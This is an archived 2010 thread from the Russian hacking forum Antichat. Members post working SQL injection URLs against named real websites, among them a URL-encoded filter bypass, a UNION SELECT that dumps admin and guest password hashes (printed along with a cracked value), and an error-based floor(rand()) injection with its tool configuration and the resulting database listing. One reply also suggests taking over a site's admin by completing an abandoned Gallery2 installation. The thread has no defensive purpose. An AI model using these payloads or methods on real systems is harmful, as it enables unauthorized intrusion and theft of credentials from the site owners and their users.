ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

24.04.2010, 15:34
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме: 540530
Репутация:
54
|
|
hahhaha т.е. какой нахер админский доступ, я имелл ввиду не уязвимость в другом параметре а именно обход фильтрации select в параметре id http://www.keyin.ca/news.asp?id=52&news=showall
|
|
|

24.04.2010, 16:23
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме: 4075418
Репутация:
386
|
|
Сообщение от pinch
hahhaha т.е. какой нахер админский доступ, я имелл ввиду не уязвимость в другом параметре а именно обход фильтрации select в параметре id http://www.keyin.ca/news.asp?id=52&news=showall
http://www.keyin.ca/news.asp?id=-52+union+%73%65%6C%65%63%74+1,2,3,version(),5&news =showall
|
|
|

24.04.2010, 19:36
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме: 540530
Репутация:
54
|
|
thanks как я недодумался....
|
|
|

24.04.2010, 22:34
|
|
Новичок
Регистрация: 29.03.2010
Сообщений: 4
Провел на форуме: 30475
Репутация:
2
|
|
WordPress 2.7.1
Имею ввиду уязвимость, позволяющая узнать пароль админа, сбросить его себе на ящик, подменить исполняемый код, SQL инъекция, узнать e-mail администратора?
Условие - регистрация закрыта, постинг запрещён, для рядового пользователя разрешены только комментарии.
|
|
|

25.04.2010, 11:42
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме: 111014
Репутация:
8
|
|
На этом сайте достал такие hash
http://slr-zone.com/lens/lens1.php?id=509+union+select+concat_ws(0x3a,g_use rName,g_hashedPassword)+from+g2_User+--+
guest:LajD09f455fd66378f12280bfd7894ce5b46
admin:kNaScfa395e30ad8195a4975c91eee51f33c
подбор
09f455fd66378f12280bfd7894ce5b46:LajD
В админку попасть не удается
http://slr-zone.com/shop/
Что можете еще посоветовать?
Заранее всем спасибо!
|
|
|

25.04.2010, 14:25
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Сообщение от FlaktW
На этом сайте достал такие hash
http://slr-zone.com/lens/lens1.php?id=509+union+select+concat_ws(0x3a,g_use rName,g_hashedPassword)+from+g2_User+--+
guest:LajD09f455fd66378f12280bfd7894ce5b46
admin:kNaScfa395e30ad8195a4975c91eee51f33c
подбор
09f455fd66378f12280bfd7894ce5b46:LajD
В админку попасть не удается
http://slr-zone.com/shop/
Что можете еще посоветовать?
Заранее всем спасибо!
прозреваю, что это хеши от старой инсталляции gallery2, которая лежит в какой-то папке на серве.
http://slr-zone.com/shop/ - это неустановленная gallery2, можешь завершить инсталляцию, вписав свои данные и там видно будет.
|
|
|

25.04.2010, 16:04
|
|
Познающий
Регистрация: 10.01.2009
Сообщений: 31
Провел на форуме: 1128838
Репутация:
36
|
|
подскажите что это?
Код:
http://www.hack0wn.com/view.php?xroot=271.0+order+by+1--&cat=exploits
есть ли тут уязвимость?
|
|
|

25.04.2010, 16:51
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
есть) хекеры там типо:
Код:
http://www.hack0wn.com/view.php?xroot=271.0+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+&cat=exploits
|
|
|

25.04.2010, 18:51
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме: 264305
Репутация:
30
|
|
Сообщение от Pashkela
есть) хекеры там типо:
Код:
http://www.hack0wn.com/view.php?xroot=271.0+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+&cat=exploits
а так такую уязвимость через тулзу раскрутить ?
сам пытался, но ни через $source_sql ни через $f_url ни в [11] Mysql inj NAME_CONST ни в [12] Mysql inj floor(rand()) подобрать правильный вариант не получилось 
|
|
|

26.04.2010, 00:46
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Сообщение от DrakonHaSh
а так такую уязвимость через тулзу раскрутить ?
сам пытался, но ни через $source_sql ни через $f_url ни в [11] Mysql inj NAME_CONST ни в [12] Mysql inj floor(rand()) подобрать правильный вариант не получилось 
Код:
$method = 1; # 1- Post; 0 - GET метод запросов | Post or Get method, 1-POST; 0-GET
$f_table = "information_schema.tables"; #
$f_url = "http://www.hack0wn.com/view.php?xroot=271.0+and+(select+1+from+"; # url
$f_plus = "+"; # %20,%2b & etc.
$f_filtr = "a)--+&cat=exploits"; # close SQL
-----------------------------------------
System information:
-----------------------------------------
base:hack0wn
basedir:/usr/
datadir:/var/lib/mysql/
os:redhat-linux-gnu
tmpdir:/tmp/
ver:5.0.86-log
-----------------------------------------
Tables in information_schema.tables - 27
-----------------------------------------
ROUTINES
VIEWS
SCHEMA_PRIVILEGES
advisories
SCHEMATA
bins
PROFILING
exploits
KEY_COLUMN_USAGE
comments
COLLATIONS
TABLE_CONSTRAINTS
profiles
COLUMN_PRIVILEGES
TABLE_PRIVILEGES
shellcodes
COLUMNS
TRIGGERS
sources
CHARACTER_SETS
TABLES
papers
COLLATION_CHARACTER_SET_APPLICABILITY
USER_PRIVILEGES
videos
STATISTICS
misc
Сообщение от auth_root
Pashkela
Это чем?
https://forum.antichat.net/thread148915-toolza.html
Последний раз редактировалось Pashkela; 26.04.2010 в 02:44..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|